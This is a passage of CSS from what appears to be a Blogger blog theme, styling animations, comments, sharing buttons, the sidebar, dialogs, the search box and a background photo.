mspin-singlecolor-large-film{\nfrom{\n-webkit-transform:translateX(0);\ntransform:translateX(0)\n}\nto{\n-webkit-transform:translateX(-3888px);\ntransform:translateX(-3888px)\n}\n}\n@-webkit-keyframes mspin-rotate{\nfrom{\n-webkit-transform:rotate(0);\ntransform:rotate(0)\n}\nto{\n-webkit-transform:rotate(360deg);\ntransform:rotate(360deg)\n}\n}\n@keyframes mspin-rotate{\nfrom{\n-webkit-transform:rotate(0);\ntransform:rotate(0)\n}\nto{\n-webkit-transform:rotate(360deg);\ntransform:rotate(360deg)\n}\n}\n@-webkit-keyframes mspin-revrot{\nfrom{\n-webkit-transform:rotate(0);\ntransform:rotate(0)\n}\nto{\n-webkit-transform:rotate(-360deg);\ntransform:rotate(-360deg)\n}\n}\n@keyframes mspin-revrot{\nfrom{\n-webkit-transform:rotate(0);\ntransform:rotate(0)\n}\nto{\n-webkit-transform:rotate(-360deg);\ntransform:rotate(-360deg)\n}\n}\n.skip-navigation{\nbackground-color:#fff;\nbox-sizing:border-box;\ncolor:#000;\ndisplay:block;\nheight:0;\nleft:0;\nline-height:50px;\noverflow:hidden;\npadding-top:0;\nposition:fixed;\ntext-align:center;\ntop:0;\n-webkit-transition:box-shadow .3s,height .3s,padding-top .3s;\ntransition:box-shadow .3s,height .3s,padding-top .3s;\nwidth:100%;\nz-index:900\n}\n.skip-navigation:focus{\nbox-shadow:0 4px 5px 0 rgba(0,0,0,.14),0 1px 10px 0 rgba(0,0,0,.12),0 2px 4px -1px rgba(0,0,0,.2);\nheight:50px\n}\n#main{\noutline:0\n}\n.main-heading{\nposition:absolute;\nclip:rect(1px,1px,1px,1px);\npadding:0;\nborder:0;\nheight:1px;\nwidth:1px;\noverflow:hidden\n}\n.Attribution{\nmargin-top:1em;\ntext-align:center\n}\n.Attribution .blogger img,.Attribution .blogger svg{\nvertical-align:bottom\n}\n.Attribution .blogger img{\nmargin-right:.5em\n}\n.Attribution div{\nline-height:24px;\nmargin-top:.5em\n}\n.Attribution .copyright,.Attribution .image-attribution{\nfont-size:.7em;\nmargin-top:1.5em\n}\n.BLOG_mobile_video_class{\ndisplay:none\n}\n.bg-photo{\nbackground-attachment:scroll!important\n}\nbody .CSS_LIGHTBOX{\nz-index:900\n}\n.extendable .show-less,.extendable .show-more{\nborder-color:#2196f3;\ncolor:#2196f3;\nmargin-top:8px\n}\n.extendable .show-less.hidden,.extendable .show-more.hidden{\ndisplay:none\n}\n.inline-ad{\ndisplay:none;\nmax-width:100%;\noverflow:hidden\n}\n.adsbygoogle{\ndisplay:block\n}\n#cookieChoiceInfo{\nbottom:0;\ntop:auto\n}\niframe.b-hbp-video{\nborder:0\n}\n.post-body img{\nmax-width:100%\n}\n.post-body iframe{\nmax-width:100%\n}\n.post-body a[imageanchor=\"1\"]{\ndisplay:inline-block\n}\n.byline{\nmargin-right:1em\n}\n.byline:last-child{\nmargin-right:0\n}\n.link-copied-dialog{\nmax-width:520px;\noutline:0\n}\n.link-copied-dialog .modal-dialog-buttons{\nmargin-top:8px\n}\n.link-copied-dialog .goog-buttonset-default{\nbackground:0 0;\nborder:0\n}\n.link-copied-dialog .goog-buttonset-default:focus{\noutline:0\n}\n.paging-control-container{\nmargin-bottom:16px\n}\n.paging-control-container .paging-control{\ndisplay:inline-block\n}\n.paging-control-container .comment-range-text::after,.paging-control-container .paging-control{\ncolor:#2196f3\n}\n.paging-control-container .comment-range-text,.paging-control-container .paging-control{\nmargin-right:8px\n}\n.paging-control-container .comment-range-text::after,.paging-control-container .paging-control::after{\ncontent:\"\\b7\";\ncursor:default;\npadding-left:8px;\npointer-events:none\n}\n.paging-control-container .comment-range-text:last-child::after,.paging-control-container .paging-control:last-child::after{\ncontent:none\n}\n.byline.reactions iframe{\nheight:20px\n}\n.b-notification{\ncolor:#000;\nbackground-color:#fff;\nborder-bottom:solid 1px #000;\nbox-sizing:border-box;\npadding:16px 32px;\ntext-align:center\n}\n.b-notification.visible{\n-webkit-transition:margin-top .3s cubic-bezier(.4,0,.2,1);\ntransition:margin-top .3s cubic-bezier(.4,0,.2,1)\n}\n.b-notification.invisible{\nposition:absolute\n}\n.b-notification-close{\nposition:absolute;\nright:8px;\ntop:8px\n}\n.no-posts-message{\nline-height:40px;\ntext-align:center\n}\n@media screen and (max-width:800px){\nbody.item-view .post-body a[imageanchor=\"1\"][style*=\"float: left;\"],body.item-view .post-body a[imageanchor=\"1\"][style*=\"float: right;\"]{\nfloat:none!important;\nclear:none!important\n}\nbody.item-view .post-body a[imageanchor=\"1\"] img{\ndisplay:block;\nheight:auto;\nmargin:0 auto\n}\nbody.item-view .post-body>.separator:first-child>a[imageanchor=\"1\"]:first-child{\nmargin-top:20px\n}\n.post-body a[imageanchor]{\ndisplay:block\n}\nbody.item-view .post-body a[imageanchor=\"1\"]{\nmargin-left:0!important;\nmargin-right:0!important\n}\nbody.item-view .post-body a[imageanchor=\"1\"]+a[imageanchor=\"1\"]{\nmargin-top:16px\n}\n}\n.item-control{\ndisplay:none\n}\n#comments{\nborder-top:1px dashed rgba(0,0,0,.54);\nmargin-top:20px;\npadding:20px\n}\n#comments .comment-thread ol{\nmargin:0;\npadding-left:0;\npadding-left:0\n}\n#comments .comment .comment-replybox-single,#comments .comment-thread .comment-replies{\nmargin-left:60px\n}\n#comments .comment-thread .thread-count{\ndisplay:none\n}\n#comments .comment{\nlist-style-type:none;\npadding:0 0 30px;\nposition:relative\n}\n#comments .comment .comment{\npadding-bottom:8px\n}\n.comment .avatar-image-container{\nposition:absolute\n}\n.comment .avatar-image-container img{\nborder-radius:50%\n}\n.avatar-image-container svg,.comment .avatar-image-container .avatar-icon{\nborder-radius:50%;\nborder:solid 1px #707070;\nbox-sizing:border-box;\nfill:#707070;\nheight:35px;\nmargin:0;\npadding:7px;\nwidth:35px\n}\n.comment .comment-block{\nmargin-top:10px;\nmargin-left:60px;\npadding-bottom:0\n}\n#comments .comment-author-header-wrapper{\nmargin-left:40px\n}\n#comments .comment .thread-expanded .comment-block{\npadding-bottom:20px\n}\n#comments .comment .comment-header .user,#comments .comment .comment-header .user a{\ncolor:#212121;\nfont-style:normal;\nfont-weight:700\n}\n#comments .comment .comment-actions{\nbottom:0;\nmargin-bottom:15px;\nposition:absolute\n}\n#comments .comment .comment-actions>*{\nmargin-right:8px\n}\n#comments .comment .comment-header .datetime{\nbottom:0;\ncolor:rgba(33,33,33,.54);\ndisplay:inline-block;\nfont-size:13px;\nfont-style:italic;\nmargin-left:8px\n}\n#comments .comment .comment-footer .comment-timestamp a,#comments .comment .comment-header .datetime a{\ncolor:rgba(33,33,33,.54)\n}\n#comments .comment .comment-content,.comment .comment-body{\nmargin-top:12px;\nword-break:break-word\n}\n.comment-body{\nmargin-bottom:12px\n}\n#comments.embed[data-num-comments=\"0\"]{\nborder:0;\nmargin-top:0;\npadding-top:0\n}\n#comments.embed[data-num-comments=\"0\"] #comment-post-message,#comments.embed[data-num-comments=\"0\"] div.comment-form>p,#comments.embed[data-num-comments=\"0\"] p.comment-footer{\ndisplay:none\n}\n#comment-editor-src{\ndisplay:none\n}\n.comments .comments-content .loadmore.loaded{\nmax-height:0;\nopacity:0;\noverflow:hidden\n}\n.extendable .remaining-items{\nheight:0;\noverflow:hidden;\n-webkit-transition:height .3s cubic-bezier(.4,0,.2,1);\ntransition:height .3s cubic-bezier(.4,0,.2,1)\n}\n.extendable .remaining-items.expanded{\nheight:auto\n}\n.svg-icon-24,.svg-icon-24-button{\ncursor:pointer;\nheight:24px;\nwidth:24px;\nmin-width:24px\n}\n.touch-icon{\nmargin:-12px;\npadding:12px\n}\n.touch-icon:active,.touch-icon:focus{\nbackground-color:rgba(153,153,153,.4);\nborder-radius:50%\n}\nsvg:not(:root).touch-icon{\noverflow:visible\n}\nhtml[dir=rtl] .rtl-reversible-icon{\n-webkit-transform:scaleX(-1);\n-ms-transform:scaleX(-1);\ntransform:scaleX(-1)\n}\n.svg-icon-24-button,.touch-icon-button{\nbackground:0 0;\nborder:0;\nmargin:0;\noutline:0;\npadding:0\n}\n.touch-icon-button .touch-icon:active,.touch-icon-button .touch-icon:focus{\nbackground-color:transparent\n}\n.touch-icon-button:active .touch-icon,.touch-icon-button:focus .touch-icon{\nbackground-color:rgba(153,153,153,.4);\nborder-radius:50%\n}\n.Profile .default-avatar-wrapper .avatar-icon{\nborder-radius:50%;\nborder:solid 1px #707070;\nbox-sizing:border-box;\nfill:#707070;\nmargin:0\n}\n.Profile .individual .default-avatar-wrapper .avatar-icon{\npadding:25px\n}\n.Profile .individual .avatar-icon,.Profile .individual .profile-img{\nheight:120px;\nwidth:120px\n}\n.Profile .team .default-avatar-wrapper .avatar-icon{\npadding:8px\n}\n.Profile .team .avatar-icon,.Profile .team .default-avatar-wrapper,.Profile .team .profile-img{\nheight:40px;\nwidth:40px\n}\n.snippet-container{\nmargin:0;\nposition:relative;\noverflow:hidden\n}\n.snippet-fade{\nbottom:0;\nbox-sizing:border-box;\nposition:absolute;\nwidth:96px\n}\n.snippet-fade{\nright:0\n}\n.snippet-fade:after{\ncontent:\"\\2026\"\n}\n.snippet-fade:after{\nfloat:right\n}\n.post-bottom{\n-webkit-box-align:center;\n-webkit-align-items:center;\n-ms-flex-align:center;\nalign-items:center;\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\n-webkit-flex-wrap:wrap;\n-ms-flex-wrap:wrap;\nflex-wrap:wrap\n}\n.post-footer{\n-webkit-box-flex:1;\n-webkit-flex:1 1 auto;\n-ms-flex:1 1 auto;\nflex:1 1 auto;\n-webkit-flex-wrap:wrap;\n-ms-flex-wrap:wrap;\nflex-wrap:wrap;\n-webkit-box-ordinal-group:2;\n-webkit-order:1;\n-ms-flex-order:1;\norder:1\n}\n.post-footer>*{\n-webkit-box-flex:0;\n-webkit-flex:0 1 auto;\n-ms-flex:0 1 auto;\nflex:0 1 auto\n}\n.post-footer .byline:last-child{\nmargin-right:1em\n}\n.jump-link{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto;\n-webkit-box-ordinal-group:3;\n-webkit-order:2;\n-ms-flex-order:2;\norder:2\n}\n.centered-top-container.sticky{\nleft:0;\nposition:fixed;\nright:0;\ntop:0;\nwidth:auto;\nz-index:50;\n-webkit-transition-property:opacity,-webkit-transform;\ntransition-property:opacity,-webkit-transform;\ntransition-property:transform,opacity;\ntransition-property:transform,opacity,-webkit-transform;\n-webkit-transition-duration:.2s;\ntransition-duration:.2s;\n-webkit-transition-timing-function:cubic-bezier(.4,0,.2,1);\ntransition-timing-function:cubic-bezier(.4,0,.2,1)\n}\n.centered-top-placeholder{\ndisplay:none\n}\n.collapsed-header .centered-top-placeholder{\ndisplay:block\n}\n.centered-top-container .Header .replaced h1,.centered-top-placeholder .Header .replaced h1{\ndisplay:none\n}\n.centered-top-container.sticky .Header .replaced h1{\ndisplay:block\n}\n.centered-top-container.sticky .Header .header-widget{\nbackground:0 0\n}\n.centered-top-container.sticky .Header .header-image-wrapper{\ndisplay:none\n}\n.centered-top-container img,.centered-top-placeholder img{\nmax-width:100%\n}\n.collapsible{\n-webkit-transition:height .3s cubic-bezier(.4,0,.2,1);\ntransition:height .3s cubic-bezier(.4,0,.2,1)\n}\n.collapsible,.collapsible>summary{\ndisplay:block;\noverflow:hidden\n}\n.collapsible>:not(summary){\ndisplay:none\n}\n.collapsible[open]>:not(summary){\ndisplay:block\n}\n.collapsible:focus,.collapsible>summary:focus{\noutline:0\n}\n.collapsible>summary{\ncursor:pointer;\ndisplay:block;\npadding:0\n}\n.collapsible:focus>summary,.collapsible>summary:focus{\nbackground-color:transparent\n}\n.collapsible>summary::-webkit-details-marker{\ndisplay:none\n}\n.collapsible-title{\n-webkit-box-align:center;\n-webkit-align-items:center;\n-ms-flex-align:center;\nalign-items:center;\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex\n}\n.collapsible-title .title{\n-webkit-box-flex:1;\n-webkit-flex:1 1 auto;\n-ms-flex:1 1 auto;\nflex:1 1 auto;\n-webkit-box-ordinal-group:1;\n-webkit-order:0;\n-ms-flex-order:0;\norder:0;\noverflow:hidden;\ntext-overflow:ellipsis;\nwhite-space:nowrap\n}\n.collapsible-title .chevron-down,.collapsible[open] .collapsible-title .chevron-up{\ndisplay:block\n}\n.collapsible-title .chevron-up,.collapsible[open] .collapsible-title .chevron-down{\ndisplay:none\n}\n.flat-button{\ncursor:pointer;\ndisplay:inline-block;\nfont-weight:700;\ntext-transform:uppercase;\nborder-radius:2px;\npadding:8px;\nmargin:-8px\n}\n.flat-icon-button{\nbackground:0 0;\nborder:0;\nmargin:0;\noutline:0;\npadding:0;\nmargin:-12px;\npadding:12px;\ncursor:pointer;\nbox-sizing:content-box;\ndisplay:inline-block;\nline-height:0\n}\n.flat-icon-button,.flat-icon-button .splash-wrapper{\nborder-radius:50%\n}\n.flat-icon-button .splash.animate{\n-webkit-animation-duration:.3s;\nanimation-duration:.3s\n}\n.overflowable-container{\nmax-height:46px;\noverflow:hidden;\nposition:relative\n}\n.overflow-button{\ncursor:pointer\n}\n#overflowable-dim-overlay{\nbackground:0 0\n}\n.overflow-popup{\nbox-shadow:0 2px 2px 0 rgba(0,0,0,.14),0 3px 1px -2px rgba(0,0,0,.2),0 1px 5px 0 rgba(0,0,0,.12);\nbackground-color:#ffffff;\nleft:0;\nmax-width:calc(100% - 32px);\nposition:absolute;\ntop:0;\nvisibility:hidden;\nz-index:101\n}\n.overflow-popup ul{\nlist-style:none\n}\n.overflow-popup .tabs li,.overflow-popup li{\ndisplay:block;\nheight:auto\n}\n.overflow-popup .tabs li{\npadding-left:0;\npadding-right:0\n}\n.overflow-button.hidden,.overflow-popup .tabs li.hidden,.overflow-popup li.hidden{\ndisplay:none\n}\n.pill-button{\nbackground:0 0;\nborder:1px solid;\nborder-radius:12px;\ncursor:pointer;\ndisplay:inline-block;\npadding:4px 16px;\ntext-transform:uppercase\n}\n.ripple{\nposition:relative\n}\n.ripple>*{\nz-index:1\n}\n.splash-wrapper{\nbottom:0;\nleft:0;\noverflow:hidden;\npointer-events:none;\nposition:absolute;\nright:0;\ntop:0;\nz-index:0\n}\n.splash{\nbackground:#ccc;\nborder-radius:100%;\ndisplay:block;\nopacity:.6;\nposition:absolute;\n-webkit-transform:scale(0);\n-ms-transform:scale(0);\ntransform:scale(0)\n}\n.splash.animate{\n-webkit-animation:ripple-effect .4s linear;\nanimation:ripple-effect .4s linear\n}\n@-webkit-keyframes ripple-effect{\n100%{\nopacity:0;\n-webkit-transform:scale(2.5);\ntransform:scale(2.5)\n}\n}\n@keyframes ripple-effect{\n100%{\nopacity:0;\n-webkit-transform:scale(2.5);\ntransform:scale(2.5)\n}\n}\n.search{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\nline-height:24px;\nwidth:24px\n}\n.search.focused{\nwidth:100%\n}\n.search.focused .section{\nwidth:100%\n}\n.search form{\nz-index:101\n}\n.search h3{\ndisplay:none\n}\n.search form{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\n-webkit-box-flex:1;\n-webkit-flex:1 0 0;\n-ms-flex:1 0 0px;\nflex:1 0 0;\nborder-bottom:solid 1px transparent;\npadding-bottom:8px\n}\n.search form>*{\ndisplay:none\n}\n.search.focused form>*{\ndisplay:block\n}\n.search .search-input label{\ndisplay:none\n}\n.centered-top-placeholder.cloned .search form{\nz-index:30\n}\n.search.focused form{\nborder-color:#ffffff;\nposition:relative;\nwidth:auto\n}\n.collapsed-header .centered-top-container .search.focused form{\nborder-bottom-color:transparent\n}\n.search-expand{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto\n}\n.search-expand-text{\ndisplay:none\n}\n.search-close{\ndisplay:inline;\nvertical-align:middle\n}\n.search-input{\n-webkit-box-flex:1;\n-webkit-flex:1 0 1px;\n-ms-flex:1 0 1px;\nflex:1 0 1px\n}\n.search-input input{\nbackground:0 0;\nborder:0;\nbox-sizing:border-box;\ncolor:#ffffff;\ndisplay:inline-block;\noutline:0;\nwidth:calc(100% - 48px)\n}\n.search-input input.no-cursor{\ncolor:transparent;\ntext-shadow:0 0 0 #ffffff\n}\n.collapsed-header .centered-top-container .search-action,.collapsed-header .centered-top-container .search-input input{\ncolor:#212121\n}\n.collapsed-header .centered-top-container .search-input input.no-cursor{\ncolor:transparent;\ntext-shadow:0 0 0 #212121\n}\n.collapsed-header .centered-top-container .search-input input.no-cursor:focus,.search-input input.no-cursor:focus{\noutline:0\n}\n.search-focused>*{\nvisibility:hidden\n}\n.search-focused .search,.search-focused .search-icon{\nvisibility:visible\n}\n.search.focused .search-action{\ndisplay:block\n}\n.search.focused .search-action:disabled{\nopacity:.3\n}\n.widget.Sharing .sharing-button{\ndisplay:none\n}\n.widget.Sharing .sharing-buttons li{\npadding:0\n}\n.widget.Sharing .sharing-buttons li span{\ndisplay:none\n}\n.post-share-buttons{\nposition:relative\n}\n.centered-bottom .share-buttons .svg-icon-24,.share-buttons .svg-icon-24{\nfill:#212121\n}\n.sharing-open.touch-icon-button:active .touch-icon,.sharing-open.touch-icon-button:focus .touch-icon{\nbackground-color:transparent\n}\n.share-buttons{\nbackground-color:#ffffff;\nborder-radius:2px;\nbox-shadow:0 2px 2px 0 rgba(0,0,0,.14),0 3px 1px -2px rgba(0,0,0,.2),0 1px 5px 0 rgba(0,0,0,.12);\ncolor:#212121;\nlist-style:none;\nmargin:0;\npadding:8px 0;\nposition:absolute;\ntop:-11px;\nmin-width:200px;\nz-index:101\n}\n.share-buttons.hidden{\ndisplay:none\n}\n.sharing-button{\nbackground:0 0;\nborder:0;\nmargin:0;\noutline:0;\npadding:0;\ncursor:pointer\n}\n.share-buttons li{\nmargin:0;\nheight:48px\n}\n.share-buttons li:last-child{\nmargin-bottom:0\n}\n.share-buttons li .sharing-platform-button{\nbox-sizing:border-box;\ncursor:pointer;\ndisplay:block;\nheight:100%;\nmargin-bottom:0;\npadding:0 16px;\nposition:relative;\nwidth:100%\n}\n.share-buttons li .sharing-platform-button:focus,.share-buttons li .sharing-platform-button:hover{\nbackground-color:rgba(128,128,128,.1);\noutline:0\n}\n.share-buttons li svg[class*=\" sharing-\"],.share-buttons li svg[class^=sharing-]{\nposition:absolute;\ntop:10px\n}\n.share-buttons li span.sharing-platform-button{\nposition:relative;\ntop:0\n}\n.share-buttons li .platform-sharing-text{\ndisplay:block;\nfont-size:16px;\nline-height:48px;\nwhite-space:nowrap\n}\n.share-buttons li .platform-sharing-text{\nmargin-left:56px\n}\n.sidebar-container{\nbackground-color:#ffffff;\nmax-width:284px;\noverflow-y:auto;\n-webkit-transition-property:-webkit-transform;\ntransition-property:-webkit-transform;\ntransition-property:transform;\ntransition-property:transform,-webkit-transform;\n-webkit-transition-duration:.3s;\ntransition-duration:.3s;\n-webkit-transition-timing-function:cubic-bezier(0,0,.2,1);\ntransition-timing-function:cubic-bezier(0,0,.2,1);\nwidth:284px;\nz-index:101;\n-webkit-overflow-scrolling:touch\n}\n.sidebar-container .navigation{\nline-height:0;\npadding:16px\n}\n.sidebar-container .sidebar-back{\ncursor:pointer\n}\n.sidebar-container .widget{\nbackground:0 0;\nmargin:0 16px;\npadding:16px 0\n}\n.sidebar-container .widget .title{\ncolor:#212121;\nmargin:0\n}\n.sidebar-container .widget ul{\nlist-style:none;\nmargin:0;\npadding:0\n}\n.sidebar-container .widget ul ul{\nmargin-left:1em\n}\n.sidebar-container .widget li{\nfont-size:16px;\nline-height:normal\n}\n.sidebar-container .widget+.widget{\nborder-top:1px dashed #cccccc\n}\n.BlogArchive li{\nmargin:16px 0\n}\n.BlogArchive li:last-child{\nmargin-bottom:0\n}\n.Label li a{\ndisplay:inline-block\n}\n.BlogArchive .post-count,.Label .label-count{\nfloat:right;\nmargin-left:.25em\n}\n.BlogArchive .post-count::before,.Label .label-count::before{\ncontent:\"(\"\n}\n.BlogArchive .post-count::after,.Label .label-count::after{\ncontent:\")\"\n}\n.widget.Translate .skiptranslate>div{\ndisplay:block!important\n}\n.widget.Profile .profile-link{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex\n}\n.widget.Profile .team-member .default-avatar-wrapper,.widget.Profile .team-member .profile-img{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto;\nmargin-right:1em\n}\n.widget.Profile .individual .profile-link{\n-webkit-box-orient:vertical;\n-webkit-box-direction:normal;\n-webkit-flex-direction:column;\n-ms-flex-direction:column;\nflex-direction:column\n}\n.widget.Profile .team .profile-link .profile-name{\n-webkit-align-self:center;\n-ms-flex-item-align:center;\nalign-self:center;\ndisplay:block;\n-webkit-box-flex:1;\n-webkit-flex:1 1 auto;\n-ms-flex:1 1 auto;\nflex:1 1 auto\n}\n.dim-overlay{\nbackground-color:rgba(0,0,0,.54);\nz-index:100\n}\nbody.sidebar-visible{\noverflow-y:hidden\n}\n@media screen and (max-width:1439px){\n.sidebar-container{\nbottom:0;\nposition:fixed;\ntop:0;\nleft:0;\nright:auto\n}\n.sidebar-container.sidebar-invisible{\n-webkit-transition-timing-function:cubic-bezier(.4,0,.6,1);\ntransition-timing-function:cubic-bezier(.4,0,.6,1);\n-webkit-transform:translateX(-284px);\n-ms-transform:translateX(-284px);\ntransform:translateX(-284px)\n}\n}\n@media screen and (min-width:1440px){\n.sidebar-container{\nposition:absolute;\ntop:0;\nleft:0;\nright:auto\n}\n.sidebar-container .navigation{\ndisplay:none\n}\n}\n.dialog{\nbox-shadow:0 2px 2px 0 rgba(0,0,0,.14),0 3px 1px -2px rgba(0,0,0,.2),0 1px 5px 0 rgba(0,0,0,.12);\nbackground:#ffffff;\nbox-sizing:border-box;\ncolor:#757575;\npadding:30px;\nposition:fixed;\ntext-align:center;\nwidth:calc(100% - 24px);\nz-index:101\n}\n.dialog input[type=email],.dialog input[type=text]{\nbackground-color:transparent;\nborder:0;\nborder-bottom:solid 1px rgba(117,117,117,.12);\ncolor:#757575;\ndisplay:block;\nfont-family:Roboto, sans-serif;\nfont-size:16px;\nline-height:24px;\nmargin:auto;\npadding-bottom:7px;\noutline:0;\ntext-align:center;\nwidth:100%\n}\n.dialog input[type=email]::-webkit-input-placeholder,.dialog input[type=text]::-webkit-input-placeholder{\ncolor:#757575\n}\n.dialog input[type=email]::-moz-placeholder,.dialog input[type=text]::-moz-placeholder{\ncolor:#757575\n}\n.dialog input[type=email]:-ms-input-placeholder,.dialog input[type=text]:-ms-input-placeholder{\ncolor:#757575\n}\n.dialog input[type=email]::-ms-input-placeholder,.dialog input[type=text]::-ms-input-placeholder{\ncolor:#757575\n}\n.dialog input[type=email]::placeholder,.dialog input[type=text]::placeholder{\ncolor:#757575\n}\n.dialog input[type=email]:focus,.dialog input[type=text]:focus{\nborder-bottom:solid 2px #2196f3;\npadding-bottom:6px\n}\n.dialog input.no-cursor{\ncolor:transparent;\ntext-shadow:0 0 0 #757575\n}\n.dialog input.no-cursor:focus{\noutline:0\n}\n.dialog input.no-cursor:focus{\noutline:0\n}\n.dialog input[type=submit]{\nfont-family:Roboto, sans-serif\n}\n.dialog .goog-buttonset-default{\ncolor:#2196f3\n}\n.subscribe-popup{\nmax-width:364px\n}\n.subscribe-popup h3{\ncolor:#212121;\nfont-size:1.8em;\nmargin-top:0\n}\n.subscribe-popup .FollowByEmail h3{\ndisplay:none\n}\n.subscribe-popup .FollowByEmail .follow-by-email-submit{\ncolor:#2196f3;\ndisplay:inline-block;\nmargin:0 auto;\nmargin-top:24px;\nwidth:auto;\nwhite-space:normal\n}\n.subscribe-popup .FollowByEmail .follow-by-email-submit:disabled{\ncursor:default;\nopacity:.3\n}\n@media (max-width:800px){\n.blog-name div.widget.Subscribe{\nmargin-bottom:16px\n}\nbody.item-view .blog-name div.widget.Subscribe{\nmargin:8px auto 16px auto;\nwidth:100%\n}\n}\n.tabs{\nlist-style:none\n}\n.tabs li{\ndisplay:inline-block\n}\n.tabs li a{\ncursor:pointer;\ndisplay:inline-block;\nfont-weight:700;\ntext-transform:uppercase;\npadding:12px 8px\n}\n.tabs .selected{\nborder-bottom:4px solid #ffffff\n}\n.tabs .selected a{\ncolor:#ffffff\n}\nbody#layout .bg-photo,body#layout .bg-photo-overlay{\ndisplay:none\n}\nbody#layout .page_body{\npadding:0;\nposition:relative;\ntop:0\n}\nbody#layout .page{\ndisplay:inline-block;\nleft:inherit;\nposition:relative;\nvertical-align:top;\nwidth:540px\n}\nbody#layout .centered{\nmax-width:954px\n}\nbody#layout .navigation{\ndisplay:none\n}\nbody#layout .sidebar-container{\ndisplay:inline-block;\nwidth:40%\n}\nbody#layout .hamburger-menu,body#layout .search{\ndisplay:none\n}\n.centered-top-container .svg-icon-24,body.collapsed-header .centered-top-placeholder .svg-icon-24{\nfill:#ffffff\n}\n.sidebar-container .svg-icon-24{\nfill:#707070\n}\n.centered-bottom .svg-icon-24,body.collapsed-header .centered-top-container .svg-icon-24{\nfill:#707070\n}\n.centered-bottom .share-buttons .svg-icon-24,.share-buttons .svg-icon-24{\nfill:#212121\n}\nbody{\nbackground-color:#eeeeee;\ncolor:#757575;\nfont:15px Roboto, sans-serif;\nmargin:0;\nmin-height:100vh\n}\nimg{\nmax-width:100%\n}\nh3{\ncolor:#757575;\nfont-size:16px\n}\na{\ntext-decoration:none;\ncolor:#2196f3\n}\na:visited{\ncolor:#2196f3\n}\na:hover{\ncolor:#2196f3\n}\nblockquote{\ncolor:#444444;\nfont:italic 300 15px Roboto, sans-serif;\nfont-size:x-large;\ntext-align:center\n}\n.pill-button{\nfont-size:12px\n}\n.bg-photo-container{\nheight:480px;\noverflow:hidden;\nposition:absolute;\nwidth:100%;\nz-index:1\n}\n.bg-photo{\nbackground:#eeeeee url(https://themes.googleusercontent.com/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw) no-repeat scroll top center /* Credit: Michael Elkan (http://www.offset.com/photos/394244) */;;\nbackground-attachment:scroll;\nbackground-size:cover;\n-webkit-filter:blur(0px);\nfilter:blur(0px);\nheight:calc(100% + 2 * 0px);\nleft:0px;\nposition:absolute;\ntop:0px;\nwidth:calc(100% + 2 * 0px)\n}\n.bg-photo-overlay{\nbackground:rgba(0,0,0,.26);\nbackground-size:cover;\nheight:480px;\nposition:absolute;\nwidth:100%;\nz-index:2\n}\n.hamburger-menu{\nfloat:left;\nmargin-top:0\n}\n.sticky .hamburger-menu{\nfloat:none;\nposition:absolute\n}\n.search{\nborder-bottom:solid 1px rgba(255, 255, 255, 0);\nfloat:right;\nposition:relative;\n-webkit-transition-property:width;\ntransition-property:width;\n-webkit-transition-duration:.5s;\ntransition-duration:.5s;\n-webkit-transition-timing-function:cubic-bezier(.4,0,.2,1);\ntransition-timing-function:cubic-bezier(.4,0,.2,1);\nz-index:101\n}\n.search .dim-overlay{\nbackground-color:transparent\n}\n.search form{\nheight:36px;\n-webkit-transition-property:border-color;\ntransition-property:border-color;\n-webkit-transition-delay:.5s;\ntransition-delay:.5s;\n-webkit-transition-duration:.2s;\ntransition-duration:.2s;\n-webkit-transition-timing-function:cubic-bezier(.4,0,.2,1);\ntransition-timing-function:cubic-bezier(.4,0,.2,1)\n}\n.search.focused{\nwidth:calc(100% - 48px)\n}\n.search.focused form{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\n-webkit-box-flex:1;\n-webkit-flex:1 0 1px;\n-ms-flex:1 0 1px;\nflex:1 0 1px;\nborder-color:#ffffff;\nmargin-left:-24px;\npadding-left:36px;\nposition:relative;\nwidth:auto\n}\n.item-view .search,.sticky .search{\nright:0;\nfloat:none;\nmargin-left:0;\nposition:absolute\n}\n.item-view .search.focused,.sticky .search.focused{\nwidth:calc(100% - 50px)\n}\n.item-view .search.focused form,.sticky .search.focused form{\nborder-bottom-color:#757575\n}\n.centered-top-placeholder.cloned .search form{\nz-index:30\n}\n.search_button{\n-webkit-box-flex:0;\n-webkit-flex:0 0 24px;\n-ms-flex:0 0 24px;\nflex:0 0 24px;\n-webkit-box-orient:vertical;\n-webkit-box-direction:normal;\n-webkit-flex-direction:column;\n-ms-flex-direction:column;\nflex-direction:column\n}\n.search_button svg{\nmargin-top:0\n}\n.search-input{\nheight:48px\n}\n.search-input input{\ndisplay:block;\ncolor:#ffffff;\nfont:16px Roboto, sans-serif;\nheight:48px;\nline-height:48px;\npadding:0;\nwidth:100%\n}\n.search-input input::-webkit-input-placeholder{\ncolor:#ffffff;\nopacity:.3\n}\n.search-input input::-moz-placeholder{\ncolor:#ffffff;\nopacity:.3\n}\n.search-input input:-ms-input-placeholder{\ncolor:#ffffff;\nopacity:.3\n}\n.search-input input::-ms-input-placeholder{\ncolor:#ffffff;\nopacity:.3\n}\n.search-input input::placeholder{\ncolor:#ffffff;\nopacity:.3\n}\n.search-action{\nbackground:0 0;\nborder:0;\ncolor:#ffffff;\ncursor:pointer;\ndisplay:none;\nheight:48px;\nmargin-top:0\n}\n.sticky .search-action{\ncolor:#757575\n}\n.search.focused .search-action{\ndisplay:block\n}\n.search.focused .search-action:disabled{\nopacity:.3\n}\n.page_body{\nposition:relative;\nz-index:20\n}\n.page_body .widget{\nmargin-bottom:16px\n}\n.page_body 